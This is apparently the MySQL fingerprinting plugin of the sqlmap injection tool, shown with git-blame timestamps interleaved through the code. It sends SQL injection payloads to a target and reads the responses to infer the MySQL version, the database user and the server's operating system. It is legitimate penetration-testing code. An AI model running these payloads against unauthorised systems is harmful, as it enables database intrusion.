2010-03-23 01:57:57 +03:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
2010-10-14 18:41:14 +04:00
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2010-03-23 01:57:57 +03:00
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
|
|
|
from lib.core.common import formatDBMSfp
|
|
|
|
from lib.core.common import formatFingerprint
|
|
|
|
from lib.core.common import getHtmlErrorFp
|
2010-06-02 16:45:40 +04:00
|
|
|
from lib.core.common import getUnicode
|
2010-03-23 01:57:57 +03:00
|
|
|
from lib.core.common import randomInt
|
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2010-11-08 12:44:32 +03:00
|
|
|
from lib.core.enums import PLACE
|
2010-03-23 01:57:57 +03:00
|
|
|
from lib.core.session import setDbms
|
|
|
|
from lib.core.settings import MYSQL_ALIASES
|
|
|
|
from lib.request import inject
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
|
|
|
|
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
|
|
|
|
|
|
|
|
class Fingerprint(GenericFingerprint):
|
|
|
|
def __init__(self):
|
|
|
|
GenericFingerprint.__init__(self)
|
|
|
|
|
|
|
|
def __commentCheck(self):
|
|
|
|
infoMsg = "executing MySQL comment injection fingerprint"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-25 18:11:47 +04:00
|
|
|
query = agent.prefixQuery("/* NoValue */")
|
2010-11-18 01:00:09 +03:00
|
|
|
query = agent.suffixQuery(query)
|
2010-03-23 01:57:57 +03:00
|
|
|
payload = agent.payload(newValue=query)
|
|
|
|
result = Request.queryPage(payload)
|
|
|
|
|
|
|
|
if not result:
|
|
|
|
warnMsg = "unable to perform MySQL comment injection"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
return None
|
|
|
|
|
|
|
|
# MySQL valid versions updated on 01/2010
|
|
|
|
versions = (
|
|
|
|
(32200, 32234), # MySQL 3.22
|
|
|
|
(32300, 32360), # MySQL 3.23
|
|
|
|
(40000, 40032), # MySQL 4.0
|
|
|
|
(40100, 40123), # MySQL 4.1
|
|
|
|
(50000, 50090), # MySQL 5.0
|
|
|
|
(50100, 50142), # MySQL 5.1
|
|
|
|
(50400, 50405), # MySQL 5.4
|
|
|
|
(50500, 50502), # MySQL 5.5
|
|
|
|
(60000, 60011), # MySQL 6.0
|
|
|
|
)
|
|
|
|
|
|
|
|
for element in versions:
|
|
|
|
prevVer = None
|
|
|
|
|
|
|
|
for version in range(element[0], element[1] + 1):
|
|
|
|
randInt = randomInt()
|
2010-06-02 16:45:40 +04:00
|
|
|
version = getUnicode(version)
|
2010-10-25 18:11:47 +04:00
|
|
|
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
|
2010-11-18 01:00:09 +03:00
|
|
|
query = agent.suffixQuery(query)
|
2010-03-23 01:57:57 +03:00
|
|
|
payload = agent.payload(newValue=query)
|
|
|
|
result = Request.queryPage(payload)
|
|
|
|
|
|
|
|
if result:
|
|
|
|
if not prevVer:
|
|
|
|
prevVer = version
|
|
|
|
|
|
|
|
if version[0] == "3":
|
|
|
|
midVer = prevVer[1:3]
|
|
|
|
else:
|
|
|
|
midVer = prevVer[2]
|
|
|
|
|
|
|
|
trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:])
|
|
|
|
|
|
|
|
return trueVer
|
|
|
|
|
|
|
|
prevVer = version
|
|
|
|
|
|
|
|
return None
|
|
|
|
|
|
|
|
def getFingerprint(self):
|
|
|
|
value = ""
|
|
|
|
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
|
|
|
|
|
|
|
if wsOsFp:
|
|
|
|
value += "%s\n" % wsOsFp
|
|
|
|
|
|
|
|
if kb.data.banner:
|
|
|
|
dbmsOsFp = formatFingerprint("back-end DBMS", kb.bannerFp)
|
|
|
|
|
|
|
|
if dbmsOsFp:
|
|
|
|
value += "%s\n" % dbmsOsFp
|
|
|
|
|
|
|
|
value += "back-end DBMS: "
|
|
|
|
actVer = formatDBMSfp()
|
|
|
|
|
|
|
|
if not conf.extensiveFp:
|
|
|
|
value += actVer
|
|
|
|
return value
|
|
|
|
|
|
|
|
comVer = self.__commentCheck()
|
|
|
|
blank = " " * 15
|
|
|
|
value += "active fingerprint: %s" % actVer
|
|
|
|
|
|
|
|
if comVer:
|
|
|
|
comVer = formatDBMSfp([comVer])
|
|
|
|
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
|
|
|
|
|
|
|
|
if kb.bannerFp:
|
|
|
|
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
|
|
|
|
|
|
|
|
if re.search("-log$", kb.data.banner):
|
|
|
|
banVer += ", logging enabled"
|
|
|
|
|
|
|
|
banVer = formatDBMSfp([banVer])
|
|
|
|
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
|
|
|
|
|
|
|
htmlErrorFp = getHtmlErrorFp()
|
|
|
|
|
|
|
|
if htmlErrorFp:
|
|
|
|
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
|
|
|
|
|
|
|
return value
|
|
|
|
|
|
|
|
def checkDbms(self):
|
|
|
|
"""
|
|
|
|
References for fingerprint:
|
|
|
|
|
|
|
|
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89)
|
|
|
|
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42)
|
|
|
|
* http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4)
|
|
|
|
* http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0)
|
|
|
|
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)
|
|
|
|
"""
|
|
|
|
|
2010-12-01 01:40:25 +03:00
|
|
|
if ((kb.dbms is not None and kb.dbms.lower() in MYSQL_ALIASES) \
|
|
|
|
or conf.dbms in MYSQL_ALIASES) and kb.dbmsVersion and \
|
|
|
|
kb.dbmsVersion[0] != "Unknown":
|
|
|
|
kb.dbmsVersion[0] = kb.dbmsVersion[0].replace(">", "")
|
|
|
|
kb.dbmsVersion[0] = kb.dbmsVersion[0].replace("=", "")
|
|
|
|
kb.dbmsVersion[0] = kb.dbmsVersion[0].replace(" ", "")
|
|
|
|
|
2010-11-02 14:59:24 +03:00
|
|
|
setDbms("%s %s" % (DBMS.MYSQL, kb.dbmsVersion[0]))
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-12-01 01:40:25 +03:00
|
|
|
if str(kb.dbmsVersion[0]) >= '5':
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.data.has_information_schema = True
|
|
|
|
|
|
|
|
self.getBanner()
|
|
|
|
|
|
|
|
if not conf.extensiveFp:
|
|
|
|
return True
|
|
|
|
|
2010-03-31 14:50:47 +04:00
|
|
|
infoMsg = "testing MySQL"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-06-02 16:45:40 +04:00
|
|
|
randInt = getUnicode(randomInt(1))
|
2010-11-08 00:18:09 +03:00
|
|
|
payload = agent.fullPayload("AND CONNECTION_ID()=CONNECTION_ID()")
|
2010-12-01 01:40:25 +03:00
|
|
|
result = Request.queryPage(payload)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
if result:
|
|
|
|
infoMsg = "confirming MySQL"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-11-28 21:10:54 +03:00
|
|
|
payload = agent.fullPayload("AND ISNULL(1/0)" if kb.injection.place != PLACE.URI else "AND ISNULL(1 DIV 0)")
|
2010-12-01 01:40:25 +03:00
|
|
|
result = Request.queryPage(payload)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
if not result:
|
2010-11-12 13:02:02 +03:00
|
|
|
warnMsg = "the back-end DBMS is not MySQL"
|
2010-03-23 01:57:57 +03:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
return False
|
|
|
|
|
|
|
|
# Determine if it is MySQL >= 5.0.0
|
2010-10-11 17:52:32 +04:00
|
|
|
if inject.getValue("SELECT %s FROM information_schema.TABLES LIMIT 0, 1" % randInt, charsetType=2, suppressOutput=True) == randInt:
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.data.has_information_schema = True
|
|
|
|
kb.dbmsVersion = [">= 5.0.0"]
|
|
|
|
|
2010-11-02 14:59:24 +03:00
|
|
|
setDbms("%s 5" % DBMS.MYSQL)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
self.getBanner()
|
|
|
|
|
|
|
|
if not conf.extensiveFp:
|
|
|
|
return True
|
|
|
|
|
|
|
|
# Check if it is MySQL >= 5.5.0
|
2010-10-11 17:52:32 +04:00
|
|
|
if inject.getValue("SELECT MID(TO_SECONDS(950501), 1, 1)", unpack=False, charsetType=2, suppressOutput=True) == "6":
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.5.0"]
|
|
|
|
|
|
|
|
# Check if it is MySQL >= 5.1.2 and < 5.5.0
|
2010-03-27 02:23:25 +03:00
|
|
|
elif inject.getValue("SELECT MID(@@table_open_cache, 1, 1)", unpack=False):
|
2010-10-11 17:52:32 +04:00
|
|
|
if inject.getValue("SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1" % randInt, unpack=False, charsetType=2, suppressOutput=True) == randInt:
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.1.12", "< 5.5.0"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1" % randInt, unpack=False, charsetType=2, suppressOutput=True) == randInt:
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.1.7", "< 5.1.12"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1" % randInt, unpack=False, charsetType=2, suppressOutput=True) == randInt:
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = ["= 5.1.6"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1" % randInt, unpack=False, charsetType=2, suppressOutput=True) == randInt:
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"]
|
|
|
|
else:
|
|
|
|
kb.dbmsVersion = [">= 5.1.2", "< 5.1.5"]
|
|
|
|
|
|
|
|
# Check if it is MySQL >= 5.0.0 and < 5.1.2
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT MID(@@hostname, 1, 1)", unpack=False, suppressOutput=True):
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT 1 FROM DUAL", charsetType=1, suppressOutput=True) == "1":
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT DATABASE() LIKE SCHEMA()", suppressOutput=True):
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"]
|
|
|
|
else:
|
|
|
|
kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"]
|
|
|
|
|
|
|
|
# Otherwise assume it is MySQL < 5.0.0
|
|
|
|
else:
|
|
|
|
kb.dbmsVersion = ["< 5.0.0"]
|
|
|
|
|
2010-11-02 14:59:24 +03:00
|
|
|
setDbms("%s 4" % DBMS.MYSQL)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
self.getBanner()
|
|
|
|
|
|
|
|
if not conf.extensiveFp:
|
|
|
|
return True
|
|
|
|
|
|
|
|
# Check which version of MySQL < 5.0.0 it is
|
2010-10-11 17:52:32 +04:00
|
|
|
coercibility = inject.getValue("SELECT COERCIBILITY(USER())", suppressOutput=True)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
if coercibility == "3":
|
|
|
|
kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"]
|
|
|
|
elif coercibility == "2":
|
|
|
|
kb.dbmsVersion = [">= 4.1.1", "< 4.1.11"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT CURRENT_USER()", suppressOutput=True):
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 4.0.6", "< 4.1.1"]
|
|
|
|
|
2010-10-11 17:52:32 +04:00
|
|
|
if inject.getValue("SELECT CHARSET(CURRENT_USER())", suppressOutput=True) == "utf8":
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = ["= 4.1.0"]
|
|
|
|
else:
|
|
|
|
kb.dbmsVersion = [">= 4.0.6", "< 4.1.0"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT FOUND_ROWS()", charsetType=1, suppressOutput=True) == "0":
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 4.0.0", "< 4.0.6"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif inject.getValue("SELECT CONNECTION_ID()", suppressOutput=True):
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 3.23.14", "< 4.0.0"]
|
2010-10-11 17:52:32 +04:00
|
|
|
elif re.search("@[\w\.\-\_]+", inject.getValue("SELECT USER()", suppressOutput=True)):
|
2010-03-23 01:57:57 +03:00
|
|
|
kb.dbmsVersion = [">= 3.22.11", "< 3.23.14"]
|
|
|
|
else:
|
|
|
|
kb.dbmsVersion = ["< 3.22.11"]
|
|
|
|
|
|
|
|
return True
|
|
|
|
else:
|
2010-11-12 13:02:02 +03:00
|
|
|
warnMsg = "the back-end DBMS is not MySQL"
|
2010-03-23 01:57:57 +03:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
return False
|
2010-11-03 13:08:27 +03:00
|
|
|
|
2010-03-23 01:57:57 +03:00
|
|
|
def checkDbmsOs(self, detailed=False):
|
|
|
|
if kb.os:
|
|
|
|
return
|
|
|
|
|
|
|
|
infoMsg = "fingerprinting the back-end DBMS operating system"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-11 17:52:32 +04:00
|
|
|
datadirSubstr = inject.getValue("SELECT MID(@@datadir, 1, 1)", unpack=False, suppressOutput=True)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
if datadirSubstr == "/":
|
|
|
|
kb.os = "Linux"
|
|
|
|
else:
|
|
|
|
kb.os = "Windows"
|
|
|
|
|
|
|
|
infoMsg = "the back-end DBMS operating system is %s" % kb.os
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.cleanup(onlyFileTbl=True)
|